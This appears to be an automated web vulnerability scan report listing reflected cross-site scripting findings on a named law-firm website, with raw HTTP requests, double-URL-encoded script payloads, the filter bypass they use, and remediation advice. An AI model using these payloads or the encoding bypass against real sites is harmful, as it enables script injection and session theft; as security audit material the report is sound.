GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
